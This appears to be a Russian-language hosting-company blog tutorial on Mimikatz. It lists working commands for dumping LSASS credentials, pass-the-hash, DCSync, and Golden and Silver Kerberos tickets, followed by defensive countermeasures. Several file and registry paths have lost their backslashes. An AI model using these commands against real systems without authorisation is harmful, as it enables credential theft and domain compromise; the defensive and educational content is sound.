Как установить и использовать Mimikatz: полное руководство для специалистов по безопасности

Mimikatz — один из наиболее известных и широко обсуждаемых инструментов в мире кибербезопасности. Изначально разработанный как proof-of-concept для демонстрации уязвимостей в аутентификации Windows, он стал незаменимым инструментом в арсенале пентестеров, red team специалистов и исследователей безопасности. Это руководство содержит подробное описание того, что такое Mimikatz, кто его использует и как ответственно установить и эксплуатировать его в контролируемой среде.

> Правовая оговорка: Mimikatz должен использоваться исключительно на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение. Несанкционированное использование является незаконным и может повлечь серьёзные уголовные наказания. Данное руководство предназначено исключительно в образовательных целях и для законного тестирования безопасности.

—

Что такое Mimikatz?

Mimikatz — это инструмент безопасности Windows с открытым исходным кодом, созданный французским исследователем безопасности Бенджамином Делпи. Его основная функция — извлечение учётных данных аутентификации, включая пароли в открытом виде, хэши паролей NTLM, PIN-коды и билеты Kerberos, — непосредственно из памяти системы Windows (конкретно из процесса LSASS).

Поскольку Windows исторически кэшировала учётные данные в памяти для поддержки бесшовной аутентификации между сервисами, Mimikatz смог выявить фундаментальный недостаток проектирования в том, как операционная система обрабатывала конфиденциальные данные аутентификации. С тех пор Microsoft внедрила средства защиты, такие как Credential Guard и группа безопасности Protected Users, однако Mimikatz продолжает развиваться вместе с этими средствами защиты, оставаясь бесценным справочным инструментом для понимания текущего ландшафта угроз.

Ключевые возможности Mimikatz

• Извлечение паролей в открытом виде из памяти Windows (LSASS)
• Дамп хэшей NTLM из базы данных SAM и Active Directory
• Извлечение и манипуляция билетами Kerberos (атаки Golden Ticket, Silver Ticket)
• Pass-the-Hash (PtH) — аутентификация с использованием перехваченных хэшей
• Pass-the-Ticket (PtT) — атаки с использованием похищенных билетов Kerberos
• DCSync-атаки для репликации данных контроллера домена без прямого доступа

—

Кто использует Mimikatz и зачем?

Легитимные сценарии использования в сфере безопасности

Mimikatz в первую очередь используется специалистами по информационной безопасности в следующих контекстах:

• Пентестинг — Моделирование реальных атак по краже учётных данных для оценки того, насколько хорошо защита организации выдерживает действия злоумышленника, получившего первоначальный доступ.
• Red team операции — Эмуляция техник продвинутых постоянных угроз (APT) для проверки возможностей обнаружения и реагирования blue team и аналитиков SOC.
• Аудиты безопасности — Оценка того, хранятся ли пароли и билеты Kerberos и защищены ли они в соответствии с лучшими практиками безопасности.
• Обучение и повышение осведомлённости — Демонстрация системным администраторам и инженерам того, как именно атаки на основе учётных данных работают на практике, делая абстрактные угрозы ощутимыми и понятными.
• Исследование уязвимостей — Выявление новых слабых мест в механизмах аутентификации Windows до того, как злоумышленники смогут их использовать.

Злонамеренное использование

К сожалению, Mimikatz также является излюбленным инструментом злоумышленников благодаря своей эффективности. Распространённые случаи злонамеренного использования включают:

• Pass-the-Hash атаки — Аутентификация в системах с использованием перехваченных хэшей NTLM без знания исходного пароля в открытом виде.
• Pass-the-Ticket атаки — Использование похищенных билетов Kerberos для имперсонации легитимных пользователей в сети.
• Закрепление после эксплуатации — Сбор учётных данных после первоначального взлома для горизонтального перемещения по сети и повышения привилегий.
• Golden Ticket атаки — Подделка Kerberos Ticket Granting Tickets (TGT) для получения постоянного, практически неограниченного доступа к ресурсам домена.

Понимание того, как злоумышленники используют Mimikatz, — это именно то, почему защитникам необходимо быть с ним знакомы. Если вы управляете средой VPS Хостинга или выделенной инфраструктурой, знание этих векторов атак помогает выстраивать более устойчивую защиту.

—

Предварительные требования

Перед началом работы убедитесь, что в вашей авторизованной тестовой среде выполнены следующие условия:

> Лучшая практика: Всегда выполняйте тестирование Mimikatz внутри изолированной виртуальной машины или выделенного лабораторного сервера. Если вам нужна безопасная, изолированная среда для лабораторий пентестинга, рассмотрите возможность развёртывания экземпляра VPS Хостинга с образом Windows, чтобы полностью отделить ваши тесты от производственной инфраструктуры.

—

Шаг 1: Загрузка Mimikatz

1.1 Посетите официальный репозиторий GitHub

Mimikatz поддерживается как проект с открытым исходным кодом. Всегда загружайте его из официального источника, чтобы избежать модифицированных или троянизированных версий:

Официальный репозиторий: https://github.com/gentilkiwi/mimikatz

1.2 Загрузите последний релиз

1. Перейдите в раздел Releases репозитория (боковая панель справа или по пути URL /releases).
2. Найдите последний стабильный релиз.
3. Загрузите предварительно скомпилированный архив — обычно называемый mimikatz_trunk.zip.

1.3 Распакуйте архив

1. Щёлкните правой кнопкой мыши на загруженном ZIP-файле.
2. Выберите Извлечь всё…
3. Выберите целевую директорию, например: C:SecurityToolsMimikatz

После извлечения вы найдёте две поддиректории:

• x64 — 64-битные бинарные файлы (используйте на современных системах)
• Win32 — 32-битные бинарные файлы (для устаревших систем)

Основной исполняемый файл, с которым вы будете работать, — mimikatz.exe.

—

Шаг 2: Запуск Mimikatz

2.1 Откройте командную строку с повышенными привилегиями

Mimikatz требует административных привилегий для взаимодействия с защищёнными областями памяти. Чтобы запустить оболочку с повышенными привилегиями:

1. Нажмите Windows + X
2. Выберите Командная строка (Администратор) или Windows PowerShell (Администратор)
3. Нажмите Да в запросе UAC

2.2 Перейдите в директорию Mimikatz

cd C:SecurityToolsMimikatzx64

Убедитесь, что mimikatz.exe присутствует в этой директории:

dir mimikatz.exe

2.3 Запустите Mimikatz

mimikatz.exe

Если инструмент успешно запустился, вы увидите баннер Mimikatz и интерактивную строку приглашения:

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

Строка приглашения mimikatz # подтверждает, что инструмент запущен и готов принимать команды.

2.4 Включите привилегии отладки

Перед выполнением большинства команд извлечения учётных данных повысьте собственные привилегии Mimikatz в рамках сессии:

mimikatz # privilege::debug

Ожидаемый вывод:

Privilege '20' OK

Это предоставляет Mimikatz право SeDebugPrivilege, которое необходимо для чтения памяти защищённых процессов, таких как LSASS.

—

Шаг 3: Основные команды Mimikatz

3.1 Извлечение паролей в открытом виде из памяти

Это наиболее известная возможность Mimikatz. Она считывает учётные данные, кэшированные провайдером аутентификации WDigest, непосредственно из памяти LSASS:

mimikatz # sekurlsa::logonpasswords

Что возвращает команда:

• Имена вошедших пользователей
• Имена доменов
• Пароли в открытом виде (если включено кэширование WDigest)
• Хэши NTLM
• Хэши SHA1
• Учётные данные Kerberos

> Примечание: В Windows 8.1 и более поздних версиях Microsoft отключила кэширование паролей в открытом виде через WDigest по умолчанию. Однако злоумышленники (и тестировщики) могут повторно включить его через ключ реестра, поэтому это остаётся актуальным тестовым случаем.

3.2 Отображение сохранённых паролей (альтернативная команда)

mimikatz # sekurlsa::passwords

Эта команда предоставляет упрощённое представление учётных данных, доступных в системной памяти.

3.3 Извлечение учётных данных из файла дампа памяти

Если вы не можете запустить Mimikatz непосредственно на целевой системе, вы можете сначала захватить дамп памяти LSASS и проанализировать его в автономном режиме:

Создайте дамп с помощью Диспетчера задач:

1. Откройте Диспетчер задач → вкладка Подробности
2. Щёлкните правой кнопкой мыши на lsass.exe → Создать файл дампа

Или используйте ProcDump (из Sysinternals):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Проанализируйте дамп с помощью Mimikatz:

mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 Список билетов Kerberos

Для перечисления всех билетов Kerberos, присутствующих в текущей сессии входа:

mimikatz # kerberos::list

Для отображения билетов с полными сведениями, включая ключи сессии:

mimikatz # kerberos::list /export

Это экспортирует каждый билет как файл .kirbi, который может быть использован в атаках Pass-the-Ticket.

3.5 Экспорт учётных данных в файл

Для сохранения вывода дампа учётных данных в текстовый файл для последующего анализа:

mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt

Вывод будет записан в credentials.txt по указанному пути.

—

Шаг 4: Продвинутые техники Mimikatz

4.1 Атака Pass-the-Hash (PtH)

Pass-the-Hash позволяет аутентифицироваться на удалённой системе с использованием перехваченного хэша NTLM без необходимости знать пароль в открытом виде:

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

Это порождает новый процесс cmd.exe, аутентифицированный как указанный пользователь с использованием хэша.

4.2 Атака Golden Ticket

Golden Ticket — это поддельный Kerberos TGT, подписанный хэшем пароля учётной записи KRBTGT, предоставляющий его владельцу практически неограниченный доступ к ресурсам домена. Для этого требуется хэш KRBTGT, который можно получить через DCSync:

Шаг 1 — DCSync для извлечения хэша KRBTGT:

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Шаг 2 — Создание Golden Ticket:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Шаг 3 — Внедрение билета:

mimikatz # kerberos::ptt golden.kirbi

4.3 Дамп хэшей NTLM из базы данных SAM

Для извлечения хэшей локальных учётных записей из базы данных SAM (требуются привилегии SYSTEM):

mimikatz # lsadump::sam

4.4 Дамп секретов из LSA

mimikatz # lsadump::secrets

Это извлекает секреты LSA, которые могут включать учётные данные сервисных учётных записей, кэшированные учётные данные домена и другие конфиденциальные данные, хранимые локальным органом безопасности.

4.5 Атака Silver Ticket

Silver Ticket нацелен на конкретный сервис, а не на весь домен. Для него требуется хэш NTLM целевой сервисной учётной записи:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

—

Шаг 5: Защитные контрмеры

Понимание того, как работает Mimikatz, — это лишь половина уравнения. Вторая половина — знание того, как защититься от него. Если вы управляете серверами Windows — будь то на Выделенных серверах или облачной инфраструктуре — следующие меры защиты являются критически важными:

5.1 Включите Credential Guard

Windows Credential Guard использует безопасность на основе виртуализации (VBS) для изоляции LSASS в защищённом контейнере, предотвращая чтение учётных данных Mimikatz непосредственно из памяти.

Включение через групповую политику:

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 Отключите аутентификацию WDigest

Предотвратите кэширование паролей в открытом виде, отключив WDigest:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Добавьте пользователей в группу Protected Users

Члены группы безопасности Protected Users не могут аутентифицироваться с использованием NTLM, DES или шифрования Kerberos RC4, что значительно снижает эффективность атак по краже учётных данных.

5.4 Реализуйте защиту LSA (RunAsPPL)

Включите Protected Process Light (PPL) для LSASS, чтобы предотвратить несанкционированный доступ к памяти:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Мониторинг индикаторов Mimikatz

Настройте ваше решение SIEM или EDR для оповещения о:

• Доступе к памяти lsass.exe из неожиданных процессов
• Предоставлении SeDebugPrivilege несистемным процессам
• Подозрительных паттернах команд sekurlsa, kerberos или lsadump в журналах процессов
• Необычных событиях создания файла дампа LSASS (Event ID 4656, 4663)

5.6 Поддерживайте системы в актуальном состоянии

Многие техники Mimikatz эксплуатируют известные уязвимости или устаревшее поведение. Поддержание Windows и Active Directory в полностью обновлённом состоянии устраняет целые классы векторов атак.

—

Mimikatz в контексте безопасной хостинговой инфраструктуры

Для организаций, запускающих веб-приложения, API или внутренние сервисы, риск кражи учётных данных выходит за рамки локальной рабочей станции. Если злоумышленник получает доступ к вашей серверной среде, такие инструменты, как Mimikatz, могут быть использованы для повышения привилегий и горизонтального перемещения.

Выбор хостинг-провайдера, который уделяет приоритетное внимание безопасности на уровне инфраструктуры, является важным уровнем защиты. Независимо от того, нужен ли вам Общий веб-хостинг для небольших проектов или Выделенные серверы для корпоративных нагрузок, обеспечение того, что ваша хостинговая среда включает DDoS-защиту, сетевую изоляцию и регулярные обновления безопасности, снижает общую поверхность атаки.

Для команд, управляющих средами Active Directory или приложениями на базе Windows, сочетание вашей инфраструктуры с правильно настроенными SSL-сертификатами гарантирует, что учётные данные, передаваемые между клиентами и серверами, зашифрованы при передаче — добавляя ещё один уровень защиты от перехвата.

—

Сводка: Справочник команд Mimikatz

—

Заключение

Mimikatz остаётся одним из наиболее мощных и поучительных инструментов, доступных специалистам по кибербезопасности. Его способность выявлять фундаментальные слабые места в механизмах аутентификации Windows обусловила значительные улучшения в том, как Microsoft проектирует защиту учётных данных — от Credential Guard до Protected Users и LSA PPL. Для пентестеров, red team специалистов и исследователей безопасности глубокое понимание Mimikatz не является опциональным — оно обязательно.

Ключевые принципы, которые всегда следует помнить:

• Всегда получайте явное письменное разрешение перед использованием Mimikatz на любой системе.
• Используйте изолированные среды — виртуальные машины или выделенные лабораторные серверы — чтобы избежать случайного раскрытия данных.
• Понимайте средства защиты так же глубоко, как понимаете атаки.
• Будьте в курсе последних изменений — как Mimikatz, так и средства защиты Windows постоянно развиваются.

Сочетая практические знания таких инструментов, как Mimikatz, с безопасной, правильно настроенной хостинговой инфраструктурой, команды безопасности могут выстраивать защиту, которая реально проверена против реальных техник атак, а не теоретических предположений.

—

*AlexHost предоставляет безопасные высокопроизводительные хостинговые решения, разработанные с учётом потребностей специалистов, ориентированных на безопасность. Изучите наши планы VPS Хостинга и Выделенных серверов, чтобы создать вашу следующую безопасную лабораторную или производственную среду.*